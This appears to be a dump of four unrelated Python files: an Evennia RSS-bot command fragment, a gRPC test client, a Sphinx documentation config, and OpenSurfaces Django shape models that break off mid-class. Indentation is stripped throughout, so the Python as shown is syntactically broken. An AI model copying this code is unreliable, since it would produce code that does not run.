matches = AccountDB.objects.filter(db_is_bot=True, db_key=botname)
if not matches:
# try dbref match
matches = AccountDB.objects.filter(db_is_bot=True, id=self.args.lstrip("#"))
if matches:
matches[0].delete()
self.msg("RSS connection destroyed.")
else:
self.msg("RSS connection/bot could not be removed, does it exist?")
return
if not self.args or not self.rhs:
string = "Usage: @rss2chan[/switches] <evennia_channel> = <rss url>"
self.msg(string)
return
channel = self.lhs
url = self.rhs
botname = "rssbot-%s" % url
# create a new bot
bot = AccountDB.objects.filter(username__iexact=botname)
if bot:
# re-use existing bot
bot = bot[0]
if not bot.is_bot:
self.msg("Account '%s' already exists and is not a bot." % botname)
return
else:
bot = create.create_account(botname, None, None, typeclass=bots.RSSBot)
bot.start(ev_channel=channel, rss_url=url, rss_rate=10)
self.msg("RSS reporter created. Fetching RSS.")
| |
# Copyright 2017 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""An example gRPC Python-using client-side application."""
import collections
import enum
import threading
import time
import grpc
from tests.testing import _application_common
from tests.testing.proto import requests_pb2
from tests.testing.proto import services_pb2
from tests.testing.proto import services_pb2_grpc
from tests.unit.framework.common import test_constants
@enum.unique
class Scenario(enum.Enum):
UNARY_UNARY = 'unary unary'
UNARY_STREAM = 'unary stream'
STREAM_UNARY = 'stream unary'
STREAM_STREAM = 'stream stream'
CONCURRENT_STREAM_UNARY = 'concurrent stream unary'
CONCURRENT_STREAM_STREAM = 'concurrent stream stream'
CANCEL_UNARY_UNARY = 'cancel unary unary'
CANCEL_UNARY_STREAM = 'cancel unary stream'
INFINITE_REQUEST_STREAM = 'infinite request stream'
class Outcome(collections.namedtuple('Outcome', ('kind', 'code', 'details'))):
"""Outcome of a client application scenario.
Attributes:
kind: A Kind value describing the overall kind of scenario execution.
code: A grpc.StatusCode value. Only valid if kind is Kind.RPC_ERROR.
details: A status details string. Only valid if kind is Kind.RPC_ERROR.
"""
@enum.unique
class Kind(enum.Enum):
SATISFACTORY = 'satisfactory'
UNSATISFACTORY = 'unsatisfactory'
RPC_ERROR = 'rpc error'
_SATISFACTORY_OUTCOME = Outcome(Outcome.Kind.SATISFACTORY, None, None)
_UNSATISFACTORY_OUTCOME = Outcome(Outcome.Kind.UNSATISFACTORY, None, None)
class _Pipe(object):
def __init__(self):
self._condition = threading.Condition()
self._values = []
self._open = True
def __iter__(self):
return self
def _next(self):
with self._condition:
while True:
if self._values:
return self._values.pop(0)
elif not self._open:
raise StopIteration()
else:
self._condition.wait()
def __next__(self): # (Python 3 Iterator Protocol)
return self._next()
def next(self): # (Python 2 Iterator Protocol)
return self._next()
def add(self, value):
with self._condition:
self._values.append(value)
self._condition.notify_all()
def close(self):
with self._condition:
self._open = False
self._condition.notify_all()
def _run_unary_unary(stub):
response = stub.UnUn(_application_common.UNARY_UNARY_REQUEST)
if _application_common.UNARY_UNARY_RESPONSE == response:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_unary_stream(stub):
response_iterator = stub.UnStre(_application_common.UNARY_STREAM_REQUEST)
try:
next(response_iterator)
except StopIteration:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_unary(stub):
response, call = stub.StreUn.with_call(
iter((_application_common.STREAM_UNARY_REQUEST,) * 3))
if (_application_common.STREAM_UNARY_RESPONSE == response and
call.code() is grpc.StatusCode.OK):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_stream_stream(stub):
request_pipe = _Pipe()
response_iterator = stub.StreStre(iter(request_pipe))
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
first_responses = next(response_iterator), next(response_iterator)
request_pipe.add(_application_common.STREAM_STREAM_REQUEST)
second_responses = next(response_iterator), next(response_iterator)
request_pipe.close()
try:
next(response_iterator)
except StopIteration:
unexpected_extra_response = False
else:
unexpected_extra_response = True
if (first_responses == _application_common.TWO_STREAM_STREAM_RESPONSES and
second_responses == _application_common.TWO_STREAM_STREAM_RESPONSES
and not unexpected_extra_response):
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_concurrent_stream_unary(stub):
future_calls = tuple(
stub.StreUn.future(iter((_application_common.STREAM_UNARY_REQUEST,) *
3))
for _ in range(test_constants.THREAD_CONCURRENCY))
for future_call in future_calls:
if future_call.code() is grpc.StatusCode.OK:
response = future_call.result()
if _application_common.STREAM_UNARY_RESPONSE != response:
return _UNSATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
def _run_concurrent_stream_stream(stub):
condition = threading.Condition()
outcomes = [None] * test_constants.RPC_CONCURRENCY
def run_stream_stream(index):
outcome = _run_stream_stream(stub)
with condition:
outcomes[index] = outcome
condition.notify()
for index in range(test_constants.RPC_CONCURRENCY):
thread = threading.Thread(target=run_stream_stream, args=(index,))
thread.start()
with condition:
while True:
if all(outcomes):
for outcome in outcomes:
if outcome.kind is not Outcome.Kind.SATISFACTORY:
return _UNSATISFACTORY_OUTCOME
else:
return _SATISFACTORY_OUTCOME
else:
condition.wait()
def _run_cancel_unary_unary(stub):
response_future_call = stub.UnUn.future(
_application_common.UNARY_UNARY_REQUEST)
initial_metadata = response_future_call.initial_metadata()
cancelled = response_future_call.cancel()
if initial_metadata is not None and cancelled:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
def _run_infinite_request_stream(stub):
def infinite_request_iterator():
while True:
yield _application_common.STREAM_UNARY_REQUEST
response_future_call = stub.StreUn.future(
infinite_request_iterator(),
timeout=_application_common.INFINITE_REQUEST_STREAM_TIMEOUT)
if response_future_call.code() is grpc.StatusCode.DEADLINE_EXCEEDED:
return _SATISFACTORY_OUTCOME
else:
return _UNSATISFACTORY_OUTCOME
_IMPLEMENTATIONS = {
Scenario.UNARY_UNARY: _run_unary_unary,
Scenario.UNARY_STREAM: _run_unary_stream,
Scenario.STREAM_UNARY: _run_stream_unary,
Scenario.STREAM_STREAM: _run_stream_stream,
Scenario.CONCURRENT_STREAM_UNARY: _run_concurrent_stream_unary,
Scenario.CONCURRENT_STREAM_STREAM: _run_concurrent_stream_stream,
Scenario.CANCEL_UNARY_UNARY: _run_cancel_unary_unary,
Scenario.INFINITE_REQUEST_STREAM: _run_infinite_request_stream,
}
def run(scenario, channel):
stub = services_pb2_grpc.FirstServiceStub(channel)
try:
return _IMPLEMENTATIONS[scenario](stub)
except grpc.RpcError as rpc_error:
return Outcome(Outcome.Kind.RPC_ERROR, rpc_error.code(),
rpc_error.details())
| |
# -*- coding: utf-8 -*-
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# google-cloud-service-usage documentation build configuration file
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath(".."))
# For plugins that can not read conf.py.
# See also: https://github.com/docascode/sphinx-docfx-yaml/issues/85
sys.path.insert(0, os.path.abspath("."))
__version__ = ""
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
needs_sphinx = "1.5.5"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.intersphinx",
"sphinx.ext.coverage",
"sphinx.ext.doctest",
"sphinx.ext.napoleon",
"sphinx.ext.todo",
"sphinx.ext.viewcode",
"recommonmark",
]
# autodoc/autosummary flags
autoclass_content = "both"
autodoc_default_options = {"members": True}
autosummary_generate = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = [".rst", ".md"]
# The encoding of source files.
# source_encoding = 'utf-8-sig'
# The root toctree document.
root_doc = "index"
# General information about the project.
project = "google-cloud-service-usage"
copyright = "2019, Google"
author = "Google APIs"
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The full version, including alpha/beta/rc tags.
release = __version__
# The short X.Y version.
version = ".".join(release.split(".")[0:2])
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
# today = ''
# Else, today_fmt is used as the format for a strftime call.
# today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = [
"_build",
"**/.nox/**/*",
"samples/AUTHORING_GUIDE.md",
"samples/CONTRIBUTING.md",
"samples/snippets/README.rst",
]
# The reST default role (used for this markup: `text`) to use for all
# documents.
# default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
# add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
# add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
# show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# A list of ignored prefixes for module index sorting.
# modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
# keep_warnings = False
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "alabaster"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
"description": "Google Cloud Client Libraries for google-cloud-service-usage",
"github_user": "googleapis",
"github_repo": "python-service-usage",
"github_banner": True,
"font_family": "'Roboto', Georgia, sans",
"head_font_family": "'Roboto', Georgia, serif",
"code_font_family": "'Roboto Mono', 'Consolas', monospace",
}
# Add any paths that contain custom themes here, relative to this directory.
# html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
# html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
# html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
# html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
# html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
# html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
# html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
# html_additional_pages = {}
# If false, no module index is generated.
# html_domain_indices = True
# If false, no index is generated.
# html_use_index = True
# If true, the index is split into individual pages for each letter.
# html_split_index = False
# If true, links to the reST sources are added to the pages.
# html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
# html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
# html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
# html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
# html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'hu', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'ru', 'sv', 'tr'
# html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
# html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
# html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = "google-cloud-service-usage-doc"
# -- Options for warnings ------------------------------------------------------
suppress_warnings = [
# Temporarily suppress this to avoid "more than one target found for
# cross-reference" warning, which are intractable for us to avoid while in
# a mono-repo.
# See https://github.com/sphinx-doc/sphinx/blob
# /2a65ffeef5c107c19084fabdd706cdff3f52d93c/sphinx/domains/python.py#L843
"ref.python"
]
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
# Latex figure (float) alignment
#'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
root_doc,
"google-cloud-service-usage.tex",
"google-cloud-service-usage Documentation",
author,
"manual",
)
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
# latex_use_parts = False
# If true, show page references after internal links.
# latex_show_pagerefs = False
# If true, show URL addresses after external links.
# latex_show_urls = False
# Documents to append as an appendix to all manuals.
# latex_appendices = []
# If false, no module index is generated.
# latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
root_doc,
"google-cloud-service-usage",
"google-cloud-service-usage Documentation",
[author],
1,
)
]
# If true, show URL addresses after external links.
# man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
root_doc,
"google-cloud-service-usage",
"google-cloud-service-usage Documentation",
author,
"google-cloud-service-usage",
"google-cloud-service-usage Library",
"APIs",
)
]
# Documents to append as an appendix to all manuals.
# texinfo_appendices = []
# If false, no module index is generated.
# texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
# texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
# texinfo_no_detailmenu = False
# Example configuration for intersphinx: refer to the Python standard library.
intersphinx_mapping = {
"python": ("https://python.readthedocs.org/en/latest/", None),
"google-auth": ("https://googleapis.dev/python/google-auth/latest/", None),
"google.api_core": ("https://googleapis.dev/python/google-api-core/latest/", None,),
"grpc": ("https://grpc.github.io/grpc/python/", None),
"proto-plus": ("https://proto-plus-python.readthedocs.io/en/latest/", None),
"protobuf": ("https://googleapis.dev/python/protobuf/latest/", None),
}
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
| |
import json
from collections import Counter
from django.db import models
from django.core.urlresolvers import reverse
from django.db.models.loading import get_model
from imagekit.models import ImageSpecField
from imagekit.processors import ResizeToFit, ResizeCanvas
from common.models import EmptyModelBase, ResultBase
from photos.models import Photo
from common.utils import compute_entropy, get_content_tuple, \
get_opensurfaces_storage
from common.geom import bbox_svg_transform
STORAGE = get_opensurfaces_storage()
##
## Categories
##
class ShapeName(EmptyModelBase):
""" Object category, e.g. "Kettle", "Cat", ... """
#: name of the category, e.g. "Kettle", "Cat", ...
name = models.CharField(max_length=127, unique=True)
#: (currently not used) an optional parent category, if caregories
#: are arranged in a tree
parent = models.ForeignKey('self', blank=True, null=True)
#: text description of this object category
description = models.TextField(blank=True)
#: a shape that can be shown as an example
representative_shape = models.ForeignKey(
'MaterialShape', blank=True, null=True)
#: if True, this is actually a special failure case category
fail = models.BooleanField(default=False)
#: values of ``name`` that are considered "fail"
FAIL_NAMES = ("Not on list", "More than one object", "I can't tell")
def material_shape_count(self):
return get_model('shapes', 'MaterialShape').objects.filter(
pixel_area__gt=Shape.MIN_PIXEL_AREA, correct=True,
name=self,
).count()
def __unicode__(self):
return self.name
class Meta:
ordering = ['-fail', 'name']
def save(self, *args, **kwargs):
if self.name in ShapeName.FAIL_NAMES:
self.fail = True
super(ShapeName, self).save(*args, **kwargs)
class ShapeSubstance(EmptyModelBase):
""" Material category, e.g. "wood", "brick", ... """
name = models.CharField(max_length=127, unique=True)
parent = models.ForeignKey('self', blank=True, null=True)
description = models.TextField(blank=True)
representative_shape = models.ForeignKey(
'MaterialShape', blank=True, null=True)
# if True, this is actually a special failure case category
fail = models.BooleanField(default=False)
# if True, this is shown as an option for new labels
active = models.BooleanField(default=False)
# each substance group corresponds to a different (possibly overlapping)
# set of potential object names
group = models.ForeignKey(
'ShapeSubstanceGroup', blank=True, null=True,
related_name='substances')
#: values of ``name`` that are considered "fail"
FAIL_NAMES = ("Not on list", "More than one material", "I can't tell")
def material_shape_count(self):
return get_model('shapes', 'MaterialShape').objects.filter(
pixel_area__gt=Shape.MIN_PIXEL_AREA, correct=True,
substance=self,
).count()
def save(self, *args, **kwargs):
if self.name in ShapeSubstance.FAIL_NAMES:
self.fail = True
super(ShapeSubstance, self).save(*args, **kwargs)
def __unicode__(self):
return self.name
class Meta:
ordering = ['-fail', 'name']
class ShapeSubstanceGroup(EmptyModelBase):
""" Grouping of substances; each substance group is assigned a list of
names that can be used """
active = models.BooleanField(default=True)
names = models.ManyToManyField(ShapeName, related_name='substance_groups')
##
## Shapes
##
class Shape(ResultBase):
""" Abstract parent describing a complex polygon. Shapes are represented
as a bag of vertices, triangles, and line segments. Users submit
instances of SubmittedShapes, which are then intersected and triangulated
to form subclasses of Shape. """
#: min size of a shape
MIN_PIXEL_AREA = 4096
#: min size of a shape for rectification
MIN_PLANAR_AREA = 16384
#: Vertices format: x1,y1,x2,y2,x3,y3,... (coords are fractions of width/height)
#: (this format allows easy embedding into javascript)
vertices = models.TextField()
#: num_vertices should be equal to len(points.split(','))//2
num_vertices = models.IntegerField(db_index=True)
#: Triangles format: p1,p2,p3,p2,p3,p4..., where p_i is an index into
#: vertices, and p1-p2-p3 is a triangle. Each triangle is three indices
#: into points; all triangles are listed together. This format allows easy
#: embedding into javascript.
triangles = models.TextField()
#: num_triangles should be equal to len(triangles.split(','))//3
num_triangles = models.IntegerField()
#: Segments format: "p1,p2,p2,p3,...", where p_i is an index into vertices,
#: and p1-p2, p2-p3, ... are the line segments. The segments are unordered.
#: Each line segment is two indices into points; all segments are listed
#: together. This format allows easy embedding into javascript.
segments = models.TextField()
#: num_segments should be equal to len(segments.split(','))//2
num_segments = models.IntegerField()
## Line segments re-grouped as poly-lines "[[p1,p2,p3,p4],[p1,p2,p3],...]",
## json encoded. Each p_i is an index into vertices. This is the exact same
## data as the segments field, but with line segments properly grouped.
#polylines = models.TextField()
## Number of unique polylines; should equal len(json.loads(polylines))
#num_polylines = models.IntegerField()
#: Area in normalized units. To get the pixel area, multiply this by the
#: total photo area.
area = models.FloatField()
#: Area in pixels
pixel_area = models.IntegerField(null=True, db_index=True)
#: flag to separate out this shape
synthetic = models.BooleanField(default=False)
synthetic_slug = models.CharField(max_length=32, blank=True)
#: if true, enough users voted this to be the correct type of segmentation
correct = models.NullBooleanField()
#: further from 0: more confident in assignment of correct
correct_score = models.FloatField(
blank=True, null=True, db_index=True)
#: if true, enough users voted this to be flat
planar = models.NullBooleanField()
#: CUBAM score for the planar field. further from 0: more confident in
#: assignment of planar.
planar_score = models.FloatField(blank=True, null=True, db_index=True)
#: method by which the planar field was set
PLANAR_METHODS = (('A', 'admin'), ('C', 'CUBAM'), ('M', 'majority vote'))
planar_method_to_str = dict((k, v) for (k, v) in PLANAR_METHODS)
planar_method = models.CharField(
max_length=1, choices=PLANAR_METHODS, blank=True, null=True)
#: Photo masked by the shape and cropped to the bounding box. The masked
#: (excluded) region has pixels that are white with no opacity (ARGB value
#: (0, 255, 255, 255)).
image_crop = models.ImageField(
upload_to='shapes', blank=True, max_length=255, storage=STORAGE)
#: square thumbnail with whitebackground
image_square_300 = ImageSpecField(
[ResizeToFit(300, 300), ResizeCanvas(300, 300, color=(255, 255, 255))],
source='image_crop', format='JPEG', options={'quality': 90}, cachefile_storage=STORAGE)
#: bbox: photo cropped out to the bounding box of this shape
image_bbox = models.ImageField(
upload_to='bbox', blank=True, max_length=255, storage=STORAGE)
#: bbox resized to fit in 512x512
image_bbox_512 = ImageSpecField(
[ResizeToFit(512, 512)],
source='image_bbox', format='JPEG', options={'quality': 90}, cachefile_storage=STORAGE)
#: bbox resized to fit in 1024x1024 (used by opengl widget in rectify task)
image_bbox_1024 = ImageSpecField(
[ResizeToFit(1024, 1024)],
source='image_bbox', format='JPEG', options={'quality': 90}, cachefile_storage=STORAGE)
#: position to show a label (normalized coordinates)
label_pos_x = models.FloatField(blank=True, null=True)
label_pos_y = models.FloatField(blank=True, null=True)
## json-encoded array [min x, min y, max x, max y] indicating the position
## of the bounding box. as usual, positions are specified as fractions of
## width and height.
#bbox = models.TextField(blank=True)
## bbox width/height aspect ratio
#bbox_aspect_ratio = models.FloatField(null=True, blank=True)
#: padded bounding box image. this is the bounding box, expanded by 25% on
#: each side (as a fraction of the bbox width,height), and then the smaller
#: dimension is expanded to as quare.
image_pbox = models.ImageField(
upload_to='pbox', blank=True, max_length=255, storage=STORAGE)
image_pbox_300 = ImageSpecField(
[ResizeToFit(300, 300)],
source='image_pbox', format='JPEG', options={'quality': 90},
cachefile_storage=STORAGE)
image_pbox_512 = ImageSpecField(
[ResizeToFit(512, 512)],
source='image_pbox', format='JPEG', options={'quality': 90},
cachefile_storage=STORAGE)
image_pbox_1024 = ImageSpecField(
[ResizeToFit(1024, 1024)],
source='image_pbox', format='JPEG', options={'quality': 90},
cachefile_storage=STORAGE)
# pbox width/height aspect ratio (as a ratio of pixel lengths)
pbox_aspect_ratio = models.FloatField(null=True, blank=True)
# json-encoded array [min x, min y, max x, max y] indicating the position
# of the padded box. as usual, positions are specified as fractions of
# width and height.
pbox = models.TextField(blank=True)
## The THREE.js vertices are re-normalized so that the aspect ratio is
## correct. The x-coordinate is now in units of height, not width.
## THREE.js json file
#three_js = models.FileField(
#upload_to='three', blank=True, max_length=255)
## THREE.js buffer file
#three_bin = models.FileField(
#upload_to='three', blank=True, max_length=255)
# approximate area of the rectified texture (in pixels)
rectified_area = models.FloatField(null=True, blank=True)
# dominant color of this shape
dominant_r = models.FloatField(null=True, blank=True)
dominant_g = models.FloatField(null=True, blank=True)
dominant_b = models.FloatField(null=True, blank=True)
# top 4 dominant colors written as #rrggbb (for easy HTML viewing)
# (in decreasing order of frequency)
dominant_rgb0 = models.CharField(max_length=7, blank=True, default='')
dominant_rgb1 = models.CharField(max_length=7, blank=True, default='')
dominant_rgb2 = models.CharField(max_length=7, blank=True, default='')
dominant_rgb3 = models.CharField(max_length=7, blank=True, default='')
# difference between top two colors
dominant_delta = models.FloatField(null=True, blank=True)
def has_fov(self):
return self.photo.fov > 0
def publishable(self):
return self.photo.publishable()
def image_pbox_height(self, width):
""" Returns the height of image_pbox_<width> """
return min(width, width / self.pbox_aspect_ratio)
def label_pos_x_scaled(self):
""" Returns the label position normalized by height instead of width
"""
return self.label_pos_x * self.photo.aspect_ratio
def label_pos_2_y_512(self):
return self.label_pos_y + 1.25 * self.photo.font_size_512()
# helpers for templates
def image_pbox_height_1024(self):
return self.image_pbox_height(1024)
def image_pbox_height_512(self):
return self.image_pbox_height(512)
def save(self, *args, **kwargs):
# compute counts:
if not self.num_vertices:
self.num_vertices = len(self.vertices.split(',')) // 2
if not self.num_triangles:
self.num_triangles = len(self.triangles.split(',')) // 3
if not self.num_segments:
self.num_segments = len(self.segments.split(',')) // 2
if not self.area:
from shapes.utils import complex_polygon_area
self.area = complex_polygon_area(self.vertices, self.triangles)
if not self.pixel_area:
self.pixel_area = (self.area * self.photo.image_orig.width *
self.photo.image_orig.height)
if not self.synthetic:
self.synthetic = self.photo.synthetic
if not self.label_pos_x or not self.label_pos_y:
from shapes.utils import update_shape_label_pos
update_shape_label_pos(self, save=False)
thumbs_dirty = (not self.id)
# compute cropped image synchronously, before saving
# (this way the shape only shows up after all thumbs are available)
if not self.image_crop or not self.image_bbox:
from shapes.utils import update_shape_image_crop
update_shape_image_crop(self, save=False)
thumbs_dirty = True
if not self.image_pbox:
from shapes.utils import update_shape_image_pbox
update_shape_image_pbox(self, save=False)
thumbs_dirty = True
#if not self.three_js or not self.three_bin:
#from shapes.utils import update_shape_three
#update_shape_three(self, save=False)
#if not self.dominant_rgb0:
if thumbs_dirty:
from shapes.utils import update_shape_dominant_rgb
update_shape_dominant_rgb(self, save=False)
if (not self.dominant_delta and
self.dominant_rgb0 and
self.dominant_rgb1):
from shapes.utils import update_shape_dominant_delta
update_shape_dominant_delta(self, save=False)
super(Shape, self).save(*args, **kwargs)
def render_full_complex_polygon_mask(
self, width=None, height=None, inverted=False):
"""
Returns a black-and-white PIL image (mode ``1``) the same size as the
original photo (unless ``width`` and ``height`` are specified. Pixels
inside the polygon are ``1`` and pixels outside are ``0`` (unless
``inverted=True``).
:param width: width in pixels, or if ``None``, use
``self.photo.orig_width``.
:param height: width in pixels, or if ``None``, use
``self.photo.orig_height``.
:param inverted: if ``True``, swap ``0`` and ``1`` in the output.
"""
from shapes.utils import render_full_complex_polygon_mask
return render_full_complex_polygon_mask(
vertices=self.vertices,
triangles=self.triangles,
width=width if width else self.photo.orig_width,
height=height if height else self.photo.orig_height,
inverted=inverted)
# temporary hack
def is_kitchen(self):
return (self.photo.scene_category.name == u'kitchen')
# temporary hack
def is_living_room(self):
return (self.photo.scene_category.name == u'living room')
# deprecated -- delete at some point
def area_pixels(self):
return (self.area *
self.photo.image_orig.width *
self.photo.image_orig.height)
def __unicode__(self):
return 'Shape (%s v)' % self.num_vertices
def segments_svg_path(self):
""" Returns all line segments as SVG path data """
verts = self.vertices.split(',') # leave as string
segs = [int(v) for v in self.segments.split(',')]
data = []
for i in xrange(0, len(segs), 2):
v0 = 2 * segs[i]
v1 = 2 * segs[i + 1]
data.append(u"M%s,%sL%s,%s" % (
verts[v0], verts[v0 + 1],
verts[v1], verts[v1 + 1],
))
return u"".join(data)
def triangles_svg_path(self):
""" Returns all triangles as SVG path data """
verts = self.vertices.split(',') # leave as string
tris = [int(v) for v in self.triangles.split(',')]
data = []
for i in xrange(0, len(tris), 3):
v0 = 2 * tris[i]
v1 = 2 * tris[i + 1]
v2 = 2 * tris[i + 2]
data.append(u"M%s,%sL%s,%sL%s,%sz" % (
verts[v0], verts[v0 + 1],
verts[v1], verts[v1 + 1],
verts[v2], verts[v2 + 1],
))
return u"".join(data)
def pbox_view_box(self):
""" Returns the padded box as the tuple
``(min_x, min_y, width, height)`` """
pbox = json.loads(self.pbox)
return (pbox[0], pbox[1], pbox[2] - pbox[0], pbox[3] - pbox[0])
def pbox_svg_transform(self):
return "scale(%s,1) %s" % (
self.pbox_aspect_ratio,
bbox_svg_transform(json.loads(self.pbox)),
)
#def shape_svg_url_large(self):
#from shapes.utils import material_shape_svg_url_large
#return material_shape_svg_url_large(self)
#def shape_svg_url_small(self):
#from shapes.utils import material_shape_svg_url_small
#return material_shape_svg_url_small(self)
def get_entry_dict(self):
""" Return a dictionary of this model containing just the fields needed
for javascript rendering. """
# generating thumbnail URLs is slow, so only generate the ones
# that will definitely be used.
ret = {
'id': self.id,
'vertices': self.vertices,
'triangles': self.triangles,
'segments': self.segments,
'photo': self.photo.get_entry_dict(),
}
if self.dominant_rgb0:
ret['dominant_rgb0'] = self.dominant_rgb0
#if self.image_pbox:
#ret['pbox'] = self.pbox
#ret['image_pbox'] = {
#'300': self.image_pbox_300.url,
#'512': self.image_pbox_512.url,
#'1024': self.image_pbox_1024.url,
#'orig': self.image_pbox.url,
#}
if self.image_bbox:
ret['image_bbox'] = {
#'512': self.image_bbox_512.url,
'1024': self.image_bbox_1024.url,
#'orig': self.image_bbox.url,
}
return ret
def mark_invalid(self, *args, **kwargs):
self.correct = False
super(Shape, self).mark_invalid(*args, **kwargs)
class Meta:
abstract = True
ordering = ['-num_vertices', '-time_ms']
class MaterialShape(Shape):
""" Complex polygon containing a single material. This is created after a
SubmittedShape has been triangulated. """
photo = models.ForeignKey(Photo, related_name='material_shapes')
#: the submitted shapes that contain this shape
submitted_shapes = models.ManyToManyField(
'SubmittedShape', related_name='material_shapes')
#: majority vote substance
substance = models.ForeignKey(ShapeSubstance, null=True, blank=True)
#: disagreement about substance
substance_entropy = models.FloatField(null=True, blank=True)
#: CUBAM score for substance
substance_score = models.FloatField(null=True, blank=True)
#: majority vote name
name = models.ForeignKey(ShapeName, null=True, blank=True)
#: disagreement about name
name_entropy = models.FloatField(null=True, blank=True)
#: CUBAM score for name
